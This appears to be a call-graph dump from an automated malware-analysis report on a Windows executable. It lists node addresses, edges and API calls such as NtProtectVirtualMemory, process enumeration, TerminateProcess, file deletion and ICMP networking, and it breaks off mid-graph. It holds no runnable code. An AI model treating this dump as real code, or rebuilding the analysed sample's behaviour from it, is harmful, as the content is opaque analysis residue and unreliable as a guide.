105131->105132 105133 a22a66 105132->105133 105133->105084 105135 a2bf73 8 API calls 105134->105135 105136 a22ddc 105135->105136 105136->105098 105137->105123 102591 a2f5e5 102594 a2cab0 102591->102594 102595 a2cacb 102594->102595 102596 a714be 102595->102596 102597 a7150c 102595->102597 102624 a2caf0 102595->102624 102600 a714c8 102596->102600 102603 a714d5 102596->102603 102596->102624 102666 aa62ff 207 API calls 2 library calls 102597->102666 102664 aa6790 207 API calls 102600->102664 102620 a2cdc0 102603->102620 102665 aa6c2d 207 API calls 2 library calls 102603->102665 102606 a7179f 102606->102606 102608 a3e807 39 API calls 102608->102624 102611 a2cdee 102612 a716e8 102673 aa6669 81 API calls 102612->102673 102619 a2cf80 39 API calls 102619->102624 102620->102611 102674 a93fe1 81 API calls __wsopen_s 102620->102674 102624->102608 102624->102611 102624->102612 102624->102619 102624->102620 102625 a30340 102624->102625 102648 a2be2d 102624->102648 102652 a3e7c1 39 API calls 102624->102652 102653 a3aa99 207 API calls 102624->102653 102654 a405b2 5 API calls __Init_thread_wait 102624->102654 102655 a3bc58 102624->102655 102660 a40413 29 API calls __onexit 102624->102660 102661 a40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102624->102661 102662 a3f4df 81 API calls 102624->102662 102663 a3f346 207 API calls 102624->102663 102667 a2b4c8 8 API calls 102624->102667 102668 a7ffaf 8 API calls 102624->102668 102669 a2bed9 102624->102669 102644 a30376 ISource 102625->102644 102626 a4014b 8 API calls 102626->102644 102627 a7632b 102750 a93fe1 81 API calls __wsopen_s 102627->102750 102629 a31695 102634 a2bed9 8 API calls 102629->102634 102641 a3049d ISource 102629->102641 102631 a75cdb 102638 a2bed9 8 API calls 102631->102638 102631->102641 102632 a7625a 102749 a93fe1 81 API calls __wsopen_s 102632->102749 102633 a2bed9 8 API calls 102633->102644 102634->102641 102638->102641 102639 a405b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102639->102644 102640 a2bf73 8 API calls 102640->102644 102641->102624 102642 a40413 29 API calls pre_c_initialization 102642->102644 102643 a76115 102747 a93fe1 81 API calls __wsopen_s 102643->102747 102644->102626 102644->102627 102644->102629 102644->102631 102644->102632 102644->102633 102644->102639 102644->102640 102644->102641 102644->102642 102644->102643 102645 a40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102644->102645 102647 a30aae ISource 102644->102647 102675 a31990 102644->102675 102737 a31e50 102644->102737 102645->102644 102748 a93fe1 81 API calls __wsopen_s 102647->102748 102649 a2be38 102648->102649 102650 a2be67 102649->102650 103567 a2bfa5 102649->103567 102650->102624 102652->102624 102653->102624 102654->102624 102656 a4014b 8 API calls 102655->102656 102657 a3bc65 102656->102657 102658 a2b329 8 API calls 102657->102658 102659 a3bc70 102658->102659 102659->102624 102660->102624 102661->102624 102662->102624 102663->102624 102664->102603 102665->102620 102666->102624 102667->102624 102668->102624 102670 a2beed 102669->102670 102672 a2befc __fread_nolock 102669->102672 102671 a4017b 8 API calls 102670->102671 102670->102672 102671->102672 102672->102624 102673->102620 102674->102606 102676 a319b6 102675->102676 102677 a31a2e 102675->102677 102678 a319c3 102676->102678 102679 a76b60 102676->102679 102680 a76a4d 102677->102680 102694 a31a3d 102677->102694 102689 a76b84 102678->102689 102690 a319cd 102678->102690 102757 aa85db 207 API calls 2 library calls 102679->102757 102682 a76b54 102680->102682 102683 a76a58 102680->102683 102756 a93fe1 81 API calls __wsopen_s 102682->102756 102755 a3b35c 207 API calls 102683->102755 102686 a76bb5 102692 a76be2 102686->102692 102693 a76bc0 102686->102693 102687 a30340 207 API calls 102687->102694 102688 a31b62 ISource 102697 a319e0 ISource 102688->102697 102713 a2bed9 8 API calls 102688->102713 102731 a31a23 ISource 102688->102731 102689->102686 102701 a76b9c 102689->102701 102690->102697 102700 a2bed9 8 API calls 102690->102700 102691 a31ba9 102699 a31bb5 102691->102699 102752 a93fe1 81 API calls __wsopen_s 102691->102752 102760 aa60e6 102692->102760 102759 aa85db 207 API calls 2 library calls 102693->102759 102694->102687 102694->102691 102695 a76979 102694->102695 102694->102697 102694->102699 102704 a76908 102694->102704 102724 a31af4 102694->102724 102754 a93fe1 81 API calls __wsopen_s 102695->102754 102702 a76dd9 102697->102702 102697->102731 102833 aa808f 53 API calls __wsopen_s 102697->102833 102699->102644 102700->102697 102758 a93fe1 81 API calls __wsopen_s 102701->102758 102709 a76e0f 102702->102709 102858 aa81ce 65 API calls 102702->102858 102753 a93fe1 81 API calls __wsopen_s 102704->102753 102860 a2b4c8 8 API calls 102709->102860 102710 a76db7 102834 a28ec0 102710->102834 102713->102697 102715 a76c08 102767 a9148b 102715->102767 102716 a76ded 102720 a28ec0 52 API calls 102716->102720 102717 a76c81 102831 a91ad8 8 API calls 102717->102831 102718 a7691d ISource 102718->102688 102718->102695 102718->102731 102734 a76df5 _wcslen 102720->102734 102723 a76c93 102832 a2bd07 8 API calls 102723->102832 102724->102691 102751 a31ca0 8 API calls 102724->102751 102725 a31b55 102725->102688 102725->102691 102728 a76c9c 102736 a9148b 8 API calls 102728->102736 102729 a76dbf _wcslen 102729->102702 102857 a2b4c8 8 API calls 102729->102857 102731->102644 102734->102709 102859 a2b4c8 8 API calls 102734->102859 102736->102697 102739 a31e6d ISource 102737->102739 102738 a32512 102741 a31ff7 ISource 102738->102741 103566 a3be08 39 API calls 102738->103566 102739->102738 102739->102741 102742 a77837 102739->102742 102746 a7766b 102739->102746 103564 a3e322 8 API calls ISource 102739->103564 102741->102644 102742->102741 103565 a4d2d5 39 API calls 102742->103565 103563 a4d2d5 39 API calls 102746->103563 102747->102647 102748->102641 102749->102641 102750->102641 102751->102725 102752->102731 102753->102718 102754->102697 102755->102688 102756->102679 102757->102697 102758->102731 102759->102697 102761 aa6101 102760->102761 102766 a76bed 102760->102766 102861 a4017b 102761->102861 102764 aa6123 102764->102766 102870 a4014b 102764->102870 102879 a91400 8 API calls 102764->102879 102766->102715 102766->102717 102768 a76c32 102767->102768 102769 a91499 102767->102769 102771 a32b20 102768->102771 102769->102768 102770 a4014b 8 API calls 102769->102770 102770->102768 102772 a32b61 102771->102772 102773 a32fc0 102772->102773 102774 a32b86 102772->102774 103026 a405b2 5 API calls __Init_thread_wait 102773->103026 102776 a32ba0 102774->102776 102777 a77bd8 102774->102777 102886 a33160 102776->102886 102989 aa7af9 102777->102989 102779 a32fca 102788 a3300b 102779->102788 103027 a2b329 102779->103027 102781 a77be4 102781->102697 102784 a33160 9 API calls 102785 a32bc6 102784->102785 102787 a32bfc 102785->102787 102785->102788 102786 a77bed 102786->102697 102789 a77bfd 102787->102789 102813 a32c18 __fread_nolock 102787->102813 102788->102786 103034 a2b4c8 8 API calls 102788->103034 103037 a93fe1 81 API calls __wsopen_s 102789->103037 102792 a33049 103035 a3e6e8 207 API calls 102792->103035 102793 a32fe4 103033 a40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102793->103033 102795 a77c15 103038 a93fe1 81 API calls __wsopen_s 102795->103038 102797 a32d3f 102799 a77c78 102797->102799 102800 a32d4c 102797->102800 103040 aa61a2 53 API calls _wcslen 102799->103040 102801 a33160 9 API calls 102800->102801 102803 a32d59 102801->102803 102808 a33160 9 API calls 102803->102808 102814 a32dd7 ISource 102803->102814 102804 a4014b 8 API calls 102804->102813 102805 a4017b 8 API calls 102805->102813 102806 a33082 103036 a3fe39 8 API calls 102806->103036 102807 a32f2d 102807->102697 102812 a32d73 102808->102812 102811 a30340 207 API calls 102811->102813 102812->102814 102820 a2bed9 8 API calls 102812->102820 102813->102792 102813->102795 102813->102797 102813->102804 102813->102805 102813->102811 102813->102814 102816 a77c59 102813->102816 102814->102806 102817 a33160 9 API calls 102814->102817 102818 a32e8b ISource 102814->102818 102896 aaa6aa 102814->102896 102904 aaa5b2 102814->102904 102910 aa9fe8 102814->102910 102913 aa0fb8 102814->102913 102938 a9664c 102814->102938 102945 a9f94a 102814->102945 102954 aa9ffc 102814->102954 102957 aaa9ac 102814->102957 102965 aaad47 102814->102965 102970 a3ac3e 102814->102970 103041 a93fe1 81 API calls __wsopen_s 102814->103041 103039 a93fe1 81 API calls __wsopen_s 102816->103039 102817->102814 102818->102807 103025 a3e322 8 API calls ISource 102818->103025 102820->102814 102831->102723 102832->102728 102833->102710 102835 a28ed2 102834->102835 102836 a28ed5 102834->102836 102835->102729 102837 a28f0b 102836->102837 102838 a28edd 102836->102838 102839 a66b1f 102837->102839 102842 a28f1d 102837->102842 102850 a66a38 102837->102850 103559 a45536 26 API calls 102838->103559 103562 a454f3 26 API calls 102839->103562 103560 a3fe6f 51 API calls 102842->103560 102843 a28eed 102846 a4014b 8 API calls 102843->102846 102844 a66b37 102844->102844 102848 a28ef7 102846->102848 102851 a2b329 8 API calls 102848->102851 102849 a66ab1 103561 a3fe6f 51 API calls 102849->103561 102850->102849 102852 a4017b 8 API calls 102850->102852 102851->102835 102853 a66a81 102852->102853 102854 a4014b 8 API calls 102853->102854 102855 a66aa8 102854->102855 102856 a2b329 8 API calls 102855->102856 102856->102849 102857->102702 102858->102716 102859->102709 102860->102731 102862 a4014b ___std_exception_copy 102861->102862 102863 a4016a 102862->102863 102866 a4016c 102862->102866 102880 a4521d 7 API calls 2 library calls 102862->102880 102863->102764 102865 a409dd 102882 a43614 RaiseException 102865->102882 102866->102865 102881 a43614 RaiseException 102866->102881 102869 a409fa 102869->102764 102871 a40150 ___std_exception_copy 102870->102871 102872 a4016a 102871->102872 102875 a4016c 102871->102875 102883 a4521d 7 API calls 2 library calls 102871->102883 102872->102764 102874 a409dd 102885 a43614 RaiseException 102874->102885 102875->102874 102884 a43614 RaiseException 102875->102884 102878 a409fa 102878->102764 102879->102764 102880->102862 102881->102865 102882->102869 102883->102871 102884->102874 102885->102878 102887 a331a1 102886->102887 102894 a3317d 102886->102894 103042 a405b2 5 API calls __Init_thread_wait 102887->103042 102889 a32bb0 102889->102784 102890 a331ab 102890->102894 103043 a40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102890->103043 102892 a39f47 102892->102889 103045 a40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102892->103045 102894->102889 103044 a405b2 5 API calls __Init_thread_wait 102894->103044 102898 aaa705 102896->102898 102903 aaa6c5 102896->102903 102897 aaa723 102901 aaa780 102897->102901 102897->102903 103079 a2c98d 39 API calls 102897->103079 102898->102897 103078 a2c98d 39 API calls 102898->103078 103046 a90372 102901->103046 102903->102814 102906 aaa5c5 102904->102906 102905 a28ec0 52 API calls 102907 aaa632 102905->102907 102906->102905 102909 aaa5d4 102906->102909 103120 a918a9 102907->103120 102909->102814 103175 aa89b6 102910->103175 102912 aa9ff8 102912->102814 102914 aa0fe1 102913->102914 102915 aa100f WSAStartup 102914->102915 103318 a2c98d 39 API calls 102914->103318 102916 aa1054 102915->102916 102937 aa1023 ISource 102915->102937 103305 a3c1f6 102916->103305 102919 aa0ffc 102919->102915 103319 a2c98d 39 API calls 102919->103319 102921 a28ec0 52 API calls 102923 aa1069 102921->102923 103310 a3f9d4 WideCharToMultiByte 102923->103310 102924 aa100b 102924->102915 102926 aa1075 inet_addr gethostbyname 102927 aa1093 IcmpCreateFile 102926->102927 102926->102937 102928 aa10d3 102927->102928 102927->102937 102929 a4017b 8 API calls 102928->102929 102930 aa10ec 102929->102930 103320 a2423c 102930->103320 102933 aa112b IcmpSendEcho 102936 aa114c 102933->102936 102934 aa1102 IcmpSendEcho 102934->102936 102935 aa1212 IcmpCloseHandle WSACleanup 102935->102937 102936->102935 102937->102814 102939 a28ec0 52 API calls 102938->102939 102940 a96662 102939->102940 103325 a8dc54 102940->103325 102942 a9666a 102943 a9666e GetLastError 102942->102943 102944 a96683 102942->102944 102943->102944 102944->102814 102946 a4017b 8 API calls 102945->102946 102947 a9f95b 102946->102947 102948 a2423c 8 API calls 102947->102948 102949 a9f965 102948->102949 102950 a28ec0 52 API calls 102949->102950 102951 a9f97c GetEnvironmentVariableW 102950->102951 103473 a9160f 8 API calls 102951->103473 102953 a9f999 ISource 102953->102814 102955 aa89b6 119 API calls 102954->102955 102956 aaa00c 102955->102956 102956->102814 102958 aaaa08 102957->102958 102964 aaa9c8 102957->102964 102962 aaaa26 102958->102962 103474 a2c98d 39 API calls 102958->103474 102961 aaaa8e 102963 a90372 58 API calls 102961->102963 102962->102961 102962->102964 103475 a2c98d 39 API calls 102962->103475 102963->102964 102964->102814 102966 a28ec0 52 API calls 102965->102966 102967 aaad63 102966->102967 103476 a8dd87 CreateToolhelp32Snapshot Process32FirstW 102967->103476 102969 aaad72 102969->102814 102971 a28ec0 52 API calls 102970->102971 102972 a3ac68 102971->102972 102973 a3bc58 8 API calls 102972->102973 102974 a3ac7f 102973->102974 102984 a3b09b _wcslen 102974->102984 103509 a2c98d 39 API calls 102974->103509 102976 a44d98 _strftime 40 API calls 102976->102984 102978 a26c03 8 API calls 102978->102984 102979 a3bbbe 43 API calls 102979->102984 102982 a3b1fb 102982->102814 102983 a2c98d 39 API calls 102983->102984 102984->102976 102984->102978 102984->102979 102984->102982 102984->102983 102985 a28ec0 52 API calls 102984->102985 102986 a28577 8 API calls 102984->102986 103495 a2396b 102984->103495 103505 a23907 102984->103505 103510 a27ad5 102984->103510 103515 a2ad40 8 API calls __fread_nolock 102984->103515 103516 a27b1a 8 API calls 102984->103516 102985->102984 102986->102984 102990 aa7b38 102989->102990 102991 aa7b52 102989->102991 103554 a93fe1 81 API calls __wsopen_s 102990->103554 102993 aa60e6 8 API calls 102991->102993 102994 aa7b5d 102993->102994 102995 a30340 206 API calls 102994->102995 102996 aa7bc1 102995->102996 102997 aa7c5c 102996->102997 103000 aa7c03 102996->103000 103020 aa7b4a 102996->103020 102998 aa7c62 102997->102998 102999 aa7cb0 102997->102999 103555 a91ad8 8 API calls 102998->103555 103001 a28ec0 52 API calls 102999->103001 102999->103020 103005 a9148b 8 API calls 103000->103005 103003 aa7cc2 103001->103003 103006 a2c2c9 8 API calls 103003->103006 103004 aa7c85 103556 a2bd07 8 API calls 103004->103556 103008 aa7c3b 103005->103008 103009 aa7ce6 CharUpperBuffW 103006->103009 103010 a32b20 206 API calls 103008->103010 103011 aa7d00 103009->103011 103010->103020 103012 aa7d53 103011->103012 103013 aa7d07 103011->103013 103014 a28ec0 52 API calls 103012->103014 103016 a9148b 8 API calls 103013->103016 103015 aa7d5b 103014->103015 103557 a3aa65 9 API calls 103015->103557 103018 aa7d35 103016->103018 103019 a32b20 206 API calls 103018->103019 103019->103020 103020->102781 103021 aa7d65 103021->103020 103022 a28ec0 52 API calls 103021->103022 103023 aa7d80 103022->103023 103558 a2bd07 8 API calls 103023->103558 103025->102818 103026->102779 103028 a2b338 _wcslen 103027->103028 103029 a4017b 8 API calls 103028->103029 103030 a2b360 __fread_nolock 103029->103030 103031 a4014b 8 API calls 103030->103031 103032 a2b376 103031->103032 103032->102793 103033->102788 103034->102792 103035->102806 103036->102806 103037->102814 103038->102814 103039->102814 103040->102812 103041->102814 103042->102890 103043->102894 103044->102892 103045->102889 103080 a902aa 103046->103080 103049 a9040b 103052 a90471 103049->103052 103055 a9041b 103049->103055 103050 a903f3 103096 a905e9 56 API calls __fread_nolock 103050->103096 103053 a904a1 103052->103053 103054 a90507 103052->103054 103071 a90399 __fread_nolock 103052->103071 103056 a904d1 103053->103056 103057 a904a6 103053->103057 103058 a905b0 103054->103058 103059 a90510 103054->103059 103060 a90453 103055->103060 103097 a92855 10 API calls 103055->103097 103056->103071 103101 a2ca5b 39 API calls 103056->103101 103057->103071 103100 a2ca5b 39 API calls 103057->103100 103058->103071 103105 a2c63f 39 API calls 103058->103105 103061 a9058d 103059->103061 103062 a90515 103059->103062 103087 a91844 103060->103087 103061->103071 103104 a2c63f 39 API calls 103061->103104 103066 a9051b 103062->103066 103067 a90554 103062->103067 103066->103071 103102 a2c63f 39 API calls 103066->103102 103067->103071 103103 a2c63f 39 API calls 103067->103103 103071->102903 103074 a90427 103098 a92855 10 API calls 103074->103098 103076 a9043e __fread_nolock 103099 a92855 10 API calls 103076->103099 103078->102897 103079->102901 103081 a902f7 103080->103081 103085 a902bb 103080->103085 103116 a2c98d 39 API calls 103081->103116 103083 a902f5 103083->103049 103083->103050 103083->103071 103084 a28ec0 52 API calls 103084->103085 103085->103083 103085->103084 103106 a44d98 103085->103106 103088 a9184f 103087->103088 103089 a4014b 8 API calls 103088->103089 103090 a91856 103089->103090 103091 a91883 103090->103091 103092 a91862 103090->103092 103093 a4017b 8 API calls 103091->103093 103094 a4017b 8 API calls 103092->103094 103095 a9186b ___scrt_fastfail 103093->103095 103094->103095 103095->103071 103096->103071 103097->103074 103098->103076 103099->103060 103100->103071 103101->103071 103102->103071 103103->103071 103104->103071 103105->103071 103107 a44da6 103106->103107 103108 a44e1b 103106->103108 103115 a44dcb 103107->103115 103117 a4f649 20 API calls __dosmaperr 103107->103117 103119 a44e2d 40 API calls 4 library calls 103108->103119 103111 a44e28 103111->103085 103112 a44db2 103118 a52b5c 26 API calls pre_c_initialization 103112->103118 103114 a44dbd 103114->103085 103115->103085 103116->103083 103117->103112 103118->103114 103119->103111 103121 a918b6 103120->103121 103122 a4014b 8 API calls 103121->103122 103123 a918bd 103122->103123 103126 a8fcb5 103123->103126 103125 a918f7 103125->102909 103144 a2c2c9 103126->103144 103128 a8fcc8 CharLowerBuffW 103134 a8fcdb 103128->103134 103129 a2655e 8 API calls 103129->103134 103130 a8fd19 103131 a8fd2b 103130->103131 103165 a2655e 103130->103165 103133 a4017b 8 API calls 103131->103133 103138 a8fd59 103133->103138 103134->103129 103134->103130 103143 a8fce5 ___scrt_fastfail 103134->103143 103137 a8fdb8 103140 a4014b 8 API calls 103137->103140 103137->103143 103139 a8fd7b 103138->103139 103168 a8fbed 8 API calls 103138->103168 103150 a8fe0c 103139->103150 103141 a8fdd2 103140->103141 103142 a4017b 8 API calls 103141->103142 103142->103143 103143->103125 103145 a2c2d9 __fread_nolock 103144->103145 103146 a2c2dc 103144->103146 103145->103128 103147 a4014b 8 API calls 103146->103147 103148 a2c2e7 103147->103148 103149 a4017b 8 API calls 103148->103149 103149->103145 103169 a2bf73 103150->103169 103153 a2bf73 8 API calls 103154 a8fe47 103153->103154 103155 a2bf73 8 API calls 103154->103155 103163 a8fe50 103155->103163 103156 a28577 8 API calls 103156->103163 103157 a90114 103157->103137 103158 a2ad40 8 API calls 103158->103163 103159 a466f8 GetStringTypeW 103159->103163 103161 a46641 39 API calls 103161->103163 103162 a8fe0c 40 API calls 103162->103163 103163->103156 103163->103157 103163->103158 103163->103159 103163->103161 103163->103162 103164 a2bed9 8 API calls 103163->103164 103174 a46722 GetStringTypeW _strftime 103163->103174 103164->103163 103166 a2c2c9 8 API calls 103165->103166 103167 a26569 103166->103167 103167->103131 103168->103138 103170 a4017b 8 API calls 103169->103170 103171 a2bf88 103170->103171 103172 a4014b 8 API calls 103171->103172 103173 a2bf96 103172->103173 103173->103153 103174->103163 103176 a28ec0 52 API calls 103175->103176 103177 aa89ed 103176->103177 103199 aa8a32 ISource 103177->103199 103213 aa9730 103177->103213 103179 aa8cde 103180 aa8eac 103179->103180 103184 aa8cec 103179->103184 103263 aa9941 59 API calls 103180->103263 103183 aa8ebb 103183->103184 103185 aa8ec7 103183->103185 103226 aa88e3 103184->103226 103185->103199 103186 a28ec0 52 API calls 103204 aa8aa6 103186->103204 103191 aa8d25 103240 a3ffe0 103191->103240 103194 aa8d5f 103248 a27e12 103194->103248 103195 aa8d45 103247 a93fe1 81 API calls __wsopen_s 103195->103247 103198 aa8d50 GetCurrentProcess TerminateProcess 103198->103194 103199->102912 103204->103179 103204->103186 103204->103199 103245 a84ad3 8 API calls __fread_nolock 103204->103245 103246 aa8f7a 41 API calls _strftime 103204->103246 103205 aa8f22 103205->103199 103207 aa8f36 FreeLibrary 103205->103207 103206 aa8d9e 103260 aa95d8 74 API calls 103206->103260 103207->103199 103212 aa8daf 103212->103205 103261 a31ca0 8 API calls 103212->103261 103262 a2b4c8 8 API calls 103212->103262 103264 aa95d8 74 API calls 103212->103264 103214 a2c2c9 8 API calls 103213->103214 103215 aa974b CharLowerBuffW 103214->103215 103265 a89805 103215->103265 103219 a2bf73 8 API calls 103220 aa9787 103219->103220 103272 a2acc0 103220->103272 103222 aa979b 103284 a2adf4 103222->103284 103224 aa98bb _wcslen 103224->103204 103225 aa97a5 _wcslen 103225->103224 103288 aa8f7a 41 API calls _strftime 103225->103288 103227 aa88fe 103226->103227 103228 aa8949 103226->103228 103229 a4017b 8 API calls 103227->103229 103232 aa9af3 103228->103232 103230 aa8920 103229->103230 103230->103228 103231 a4014b 8 API calls 103230->103231 103231->103230 103233 aa9d08 ISource 103232->103233 103238 aa9b17 _strcat _wcslen ___std_exception_copy 103232->103238 103233->103191 103234 a2c98d 39 API calls 103234->103238 103235 a2c63f 39 API calls 103235->103238 103236 a2ca5b 39 API calls 103236->103238 103237 a28ec0 52 API calls 103237->103238 103238->103233 103238->103234 103238->103235 103238->103236 103238->103237 103292 a8f8c5 10 API calls _wcslen 103238->103292 103241 a3fff5 103240->103241 103242 a4008d NtProtectVirtualMemory 103241->103242 103243 a4005b 103241->103243 103244 a4007b CloseHandle 103241->103244 103242->103243 103243->103194 103243->103195 103244->103243 103245->103204 103246->103204 103247->103198 103249 a27e1a 103248->103249 103250 a4014b 8 API calls 103249->103250 103251 a27e28 103250->103251 103293 a28445 103251->103293 103254 a28470 103296 a2c760 103254->103296 103256 a28480 103257 a4017b 8 API calls 103256->103257 103258 a2851c 103256->103258 103257->103258 103258->103212 103259 a31ca0 8 API calls 103258->103259 103259->103206 103260->103212 103261->103212 103262->103212 103263->103183 103264->103212 103266 a89825 _wcslen 103265->103266 103267 a89914 103266->103267 103269 a89919 103266->103269 103270 a8985a 103266->103270 103267->103219 103267->103225 103269->103267 103290 a3e36b 41 API calls 103269->103290 103270->103267 103289 a3e36b 41 API calls 103270->103289 103274 a2ace1 103272->103274 103283 a2accf 103272->103283 103273 a2c2c9 8 API calls 103275 a705a3 __fread_nolock 103273->103275 103276 a70557 103274->103276 103277 a2ad07 103274->103277 103274->103283 103278 a4014b 8 API calls 103276->103278 103291 a288e8 8 API calls 103277->103291 103281 a70561 103278->103281 103280 a2acda __fread_nolock 103280->103222 103282 a4017b 8 API calls 103281->103282 103282->103283 103283->103273 103283->103280 103285 a2ae02 103284->103285 103287 a2ae0b __fread_nolock 103284->103287 103286 a2c2c9 8 API calls 103285->103286 103285->103287 103286->103287 103287->103225 103288->103224 103289->103270 103290->103269 103291->103280 103292->103238 103294 a4014b 8 API calls 103293->103294 103295 a27e30 103294->103295 103295->103254 103297 a2c76b 103296->103297 103298 a71285 103297->103298 103303 a2c773 ISource 103297->103303 103299 a4014b 8 API calls 103298->103299 103301 a71291 103299->103301 103300 a2c77a 103300->103256 103303->103300 103304 a2c7e0 8 API calls ISource 103303->103304 103304->103303 103306 a4017b 8 API calls 103305->103306 103307 a3c209 103306->103307 103308 a4014b 8 API calls 103307->103308 103309 a3c215 103308->103309 103309->102921 103311 a3fa35 103310->103311 103312 a3f9fe 103310->103312 103324 a3fe8a 8 API calls 103311->103324 103313 a4017b 8 API calls 103312->103313 103315 a3fa05 WideCharToMultiByte 103313->103315 103323 a3fa3e 8 API calls __fread_nolock 103315->103323 103317 a3fa29 103317->102926 103318->102919 103319->102924 103321 a4014b 8 API calls 103320->103321 103322 a2424e 103321->103322 103322->102933 103322->102934 103323->103317 103324->103317 103326 a2bf73 8 API calls 103325->103326 103327 a8dc73 103326->103327 103328 a2bf73 8 API calls 103327->103328 103329 a8dc7c 103328->103329 103330 a2bf73 8 API calls 103329->103330 103331 a8dc85 103330->103331 103349 a25851 103331->103349 103336 a8dcab 103361 a2568e 103336->103361 103337 a26b7c 8 API calls 103337->103336 103339 a8dcbf FindFirstFileW 103340 a8dd4b FindClose 103339->103340 103345 a8dcde 103339->103345 103344 a8dd56 103340->103344 103341 a8dd26 FindNextFileW 103341->103345 103342 a2bed9 8 API calls 103342->103345 103344->102942 103345->103340 103345->103341 103345->103342 103403 a27bb5 103345->103403 103412 a26b7c 103345->103412 103348 a8dd42 FindClose 103348->103344 103421 a622d0 103349->103421 103352 a25898 103439 a2bd57 103352->103439 103353 a2587d 103427 a28577 103353->103427 103356 a25889 103423 a255dc 103356->103423 103359 a8eab0 GetFileAttributesW 103360 a8dc99 103359->103360 103360->103336 103360->103337 103362 a2bf73 8 API calls 103361->103362 103363 a256a4 103362->103363 103364 a2bf73 8 API calls 103363->103364 103365 a256ac 103364->103365 103366 a2bf73 8 API calls 103365->103366 103367 a256b4 103366->103367 103368 a2bf73 8 API calls 103367->103368 103369 a256bc 103368->103369 103370 a256f0 103369->103370 103371 a64da1 103369->103371 103373 a2acc0 8 API calls 103370->103373 103372 a2bed9 8 API calls 103371->103372 103375 a64daa 103372->103375 103374 a256fe 103373->103374 103376 a2adf4 8 API calls 103374->103376 103377 a2bd57 8 API calls 103375->103377 103378 a25708 103376->103378 103379 a25733 103377->103379 103378->103379 103380 a2acc0 8 API calls 103378->103380 103381 a25754 103379->103381 103395 a25778 103379->103395 103398 a64dcc 103379->103398 103383 a25729 103380->103383 103387 a2655e 8 API calls 103381->103387 103381->103395 103382 a2acc0 8 API calls 103384 a25789 103382->103384 103385 a2adf4 8 API calls 103383->103385 103386 a2579f 103384->103386 103391 a2bed9 8 API calls 103384->103391 103385->103379 103390 a257b3 103386->103390 103393 a2bed9 8 API calls 103386->103393 103388 a25761 103387->103388 103392 a2acc0 8 API calls 103388->103392 103388->103395 103389 a28577 8 API calls 103400 a64e8c 103389->103400 103394 a2bed9 8 API calls 103390->103394 103396 a257be 103390->103396 103391->103386 103392->103395 103393->103390 103394->103396 103395->103382 103397 a2bed9 8 API calls 103396->103397 103401 a257c9 103396->103401 103397->103401 103398->103389 103399 a2655e 8 API calls 103399->103400 103400->103395 103400->103399 103446 a2ad40 8 API calls __fread_nolock 103400->103446 103401->103339 103404 a27bc7 103403->103404 103405 a6641d 103403->103405 103447 a27bd8 103404->103447 103457 a813c8 8 API calls __fread_nolock 103405->103457 103408 a27bd3 103408->103345 103409 a66427 103410 a66433 103409->103410 103411 a2bed9 8 API calls 103409->103411 103411->103410 103413 a26b93 103412->103413 103414 a657fe 103412->103414 103463 a26ba4 103413->103463 103416 a4014b 8 API calls 103414->103416 103418 a65808 _wcslen 103416->103418 103417 a26b9e DeleteFileW 103417->103341 103417->103348 103419 a4017b 8 API calls 103418->103419 103420 a65841 __fread_nolock 103419->103420 103422 a2585e GetFullPathNameW 103421->103422 103422->103352 103422->103353 103424 a255ea 103423->103424 103425 a2adf4 8 API calls 103424->103425 103426 a255fe 103425->103426 103426->103359 103428 a28587 _wcslen 103427->103428 103429 a66610 103427->103429 103432 a285c2 103428->103432 103433 a2859d 103428->103433 103430 a2adf4 8 API calls 103429->103430 103431 a66619 103430->103431 103431->103431 103434 a4014b 8 API calls 103432->103434 103445 a288e8 8 API calls 103433->103445 103436 a285ce 103434->103436 103438 a4017b 8 API calls 103436->103438 103437 a285a5 __fread_nolock 103437->103356 103438->103437 103440 a2bd71 103439->103440 103444 a2bd64 103439->103444 103441 a4014b 8 API calls 103440->103441 103442 a2bd7b 103441->103442 103443 a4017b 8 API calls 103442->103443 103443->103444 103444->103356 103445->103437 103446->103400 103448 a27c1b __fread_nolock 103447->103448 103449 a27be7 103447->103449 103448->103408 103449->103448 103450 a6644e 103449->103450 103451 a27c0e 103449->103451 103452 a4014b 8 API calls 103450->103452 103458 a27d74 103451->103458 103454 a6645d 103452->103454 103455 a4017b 8 API calls 103454->103455 103456 a66491 __fread_nolock 103455->103456 103457->103409 103459 a27d8a 103458->103459 103462 a27d85 __fread_nolock 103458->103462 103460 a4017b 8 API calls 103459->103460 103461 a66528 103459->103461 103460->103462 103461->103461 103462->103448 103464 a26bb4 _wcslen 103463->103464 103465 a26bc7 103464->103465 103466 a65860 103464->103466 103467 a27d74 8 API calls 103465->103467 103468 a4014b 8 API calls 103466->103468 103469 a26bd4 __fread_nolock 103467->103469 103470 a6586a 103468->103470 103469->103417 103471 a4017b 8 API calls 103470->103471 103472 a6589a __fread_nolock 103471->103472 103473->102953 103474->102962 103475->102961 103486 a8e80e 103476->103486 103478 a8ddd4 Process32NextW 103479 a8de86 CloseHandle 103478->103479 103483 a8ddcd 103478->103483 103479->102969 103480 a2bf73 8 API calls 103480->103483 103481 a2b329 8 API calls 103481->103483 103482 a2568e 8 API calls 103482->103483 103483->103478 103483->103479 103483->103480 103483->103481 103483->103482 103484 a27bb5 8 API calls 103483->103484 103492 a3e36b 41 API calls 103483->103492 103484->103483 103490 a8e819 103486->103490 103487 a8e830 103494 a4666b 39 API calls _strftime 103487->103494 103490->103487 103491 a8e836 103490->103491 103493 a46722 GetStringTypeW _strftime 103490->103493 103491->103483 103492->103483 103493->103490 103494->103491 103496 a23996 ___scrt_fastfail 103495->103496 103517 a25f32 103496->103517 103500 a23a3a Shell_NotifyIconW 103521 a261a9 103500->103521 103501 a640cd Shell_NotifyIconW 103502 a23a1c 103502->103500 103502->103501 103504 a23a50 103504->102984 103506 a23969 103505->103506 103507 a23919 ___scrt_fastfail 103505->103507 103506->102984 103508 a23938 Shell_NotifyIconW 103507->103508 103508->103506 103509->102984 103511 a4017b 8 API calls 103510->103511 103512 a27afa 103511->103512 103513 a4014b 8 API calls 103512->103513 103514 a27b08 103513->103514 103514->102984 103515->102984 103516->102984 103518 a239eb 103517->103518 103519 a25f4e 103517->103519 103518->103502 103551 a8d11f 42 API calls _strftime 103518->103551 103519->103518 103520 a65070 DestroyIcon 103519->103520 103520->103518 103522 a261c6 103521->103522 103523 